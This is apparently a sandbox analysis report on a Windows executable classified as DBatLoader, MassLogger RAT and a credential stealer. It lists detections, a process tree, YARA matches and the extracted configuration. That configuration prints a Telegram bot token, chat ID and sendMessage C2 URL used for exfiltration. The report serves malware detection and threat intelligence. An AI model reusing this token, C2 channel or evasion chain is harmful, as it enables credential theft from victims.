Edit tour

Windows Analysis Report
y79a2l1FY5.exe

Overview

General Information

Sample name:	y79a2l1FY5.exe renamed because original name is a hash value
Original sample name:	1a3d4243cf435ec6034f3814551150ed.exe
Analysis ID:	1636869
MD5:	1a3d4243cf435ec6034f3814551150ed
SHA1:	3ee58a6e81c9b43fdceb3d8c1bf7d053f92c7073
SHA256:	95d10ff038effd4a63c0cdd97b40da1877c01a21d91cf0d72917387f1771d024
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

y79a2l1FY5.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\y79a2l1FY5.exe" MD5: 1A3D4243CF435EC6034F3814551150ED)

cmd.exe (PID: 6868 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7160 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)

dajivhqI.pif (PID: 6164 cmdline: C:\\Users\\user\\Links\dajivhqI.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.883239659.00000000023CE000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5dfea:$a1: get_encryptedPassword 0x5dfbe:$a2: get_encryptedUsername 0x5e082:$a3: get_timePasswordChanged 0x5df9a:$a4: get_passwordField 0x5e000:$a5: set_encryptedPassword 0x5ddcd:$a7: get_logins 0x5d357:$a8: GetOutlookPasswords 0x5c86b:$a9: StartKeylogger 0x5b2c5:$a10: KeyLoggerEventArgs 0x5b294:$a11: KeyLoggerEventArgsEventHandler 0x5dea1:$a13: _encryptedPassword
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d59c:$a1: get_encryptedPassword 0x1d570:$a2: get_encryptedUsername 0x1d634:$a3: get_timePasswordChanged 0x1d54c:$a4: get_passwordField 0x1d5b2:$a5: set_encryptedPassword 0x1d37f:$a7: get_logins 0x1c909:$a8: GetOutlookPasswords 0x1be1d:$a9: StartKeylogger 0x1a877:$a10: KeyLoggerEventArgs 0x1a846:$a11: KeyLoggerEventArgsEventHandler 0x1d453:$a13: _encryptedPassword
00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21195:$a3: \Google\Chrome\User Data\Default\Login Data 0x214a3:$a4: \Orbitum\User Data\Default\Login Data 0x2229b:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21b0c:$a1: get_encryptedPassword 0x49a44:$a1: get_encryptedPassword 0x21ae0:$a2: get_encryptedUsername 0x49a18:$a2: get_encryptedUsername 0x21ba4:$a3: get_timePasswordChanged 0x49adc:$a3: get_timePasswordChanged 0x21abc:$a4: get_passwordField 0x499f4:$a4: get_passwordField 0x21b22:$a5: set_encryptedPassword 0x49a5a:$a5: set_encryptedPassword 0x218ef:$a7: get_logins 0x49827:$a7: get_logins 0x20e79:$a8: GetOutlookPasswords 0x48db1:$a8: GetOutlookPasswords 0x2038d:$a9: StartKeylogger 0x482c5:$a9: StartKeylogger 0x1ede7:$a10: KeyLoggerEventArgs 0x46d1f:$a10: KeyLoggerEventArgs 0x1edb6:$a11: KeyLoggerEventArgsEventHandler 0x46cee:$a11: KeyLoggerEventArgsEventHandler 0x219c3:$a13: _encryptedPassword
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c99c:$a1: get_encryptedPassword 0x1c970:$a2: get_encryptedUsername 0x1ca34:$a3: get_timePasswordChanged 0x1c94c:$a4: get_passwordField 0x1c9b2:$a5: set_encryptedPassword 0x1c77f:$a7: get_logins 0x1bd09:$a8: GetOutlookPasswords 0x1b21d:$a9: StartKeylogger 0x19c77:$a10: KeyLoggerEventArgs 0x19c46:$a11: KeyLoggerEventArgsEventHandler 0x1c853:$a13: _encryptedPassword
00000007.00000002.3350716480.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: y79a2l1FY5.exe PID: 6664	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: dajivhqI.pif PID: 6164	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: dajivhqI.pif PID: 6164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dajivhqI.pif PID: 6164	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: dajivhqI.pif PID: 6164	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: dajivhqI.pif PID: 6164	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33717:$a1: get_encryptedPassword 0x569d6:$a1: get_encryptedPassword 0x7bf0b:$a1: get_encryptedPassword 0x8b405:$a1: get_encryptedPassword 0xd7c3f:$a1: get_encryptedPassword 0x336eb:$a2: get_encryptedUsername 0x569aa:$a2: get_encryptedUsername 0x7bedf:$a2: get_encryptedUsername 0x8b3d9:$a2: get_encryptedUsername 0xd7c13:$a2: get_encryptedUsername 0x337af:$a3: get_timePasswordChanged 0x56a6e:$a3: get_timePasswordChanged 0x7bfa3:$a3: get_timePasswordChanged 0x8b49d:$a3: get_timePasswordChanged 0xd7cd7:$a3: get_timePasswordChanged 0x336c7:$a4: get_passwordField 0x56986:$a4: get_passwordField 0x7bebb:$a4: get_passwordField 0x8b3b5:$a4: get_passwordField 0xd7bef:$a4: get_passwordField 0x3372d:$a5: set_encryptedPassword
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.1.dajivhqI.pif.46b268.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.1.dajivhqI.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x502e0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x332b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51fba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51c00:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x510b8:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.y79a2l1FY5.exe.212c9ba8.7.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f2b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
7.1.dajivhqI.pif.438038.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x502e0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x332b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51fba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51c00:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x510b8:$s6: constructor or from DllMain.
0.2.y79a2l1FY5.exe.212c9ba8.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x502e0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x332b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x33930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x51fba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x51c00:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x510b8:$s6: constructor or from DllMain.
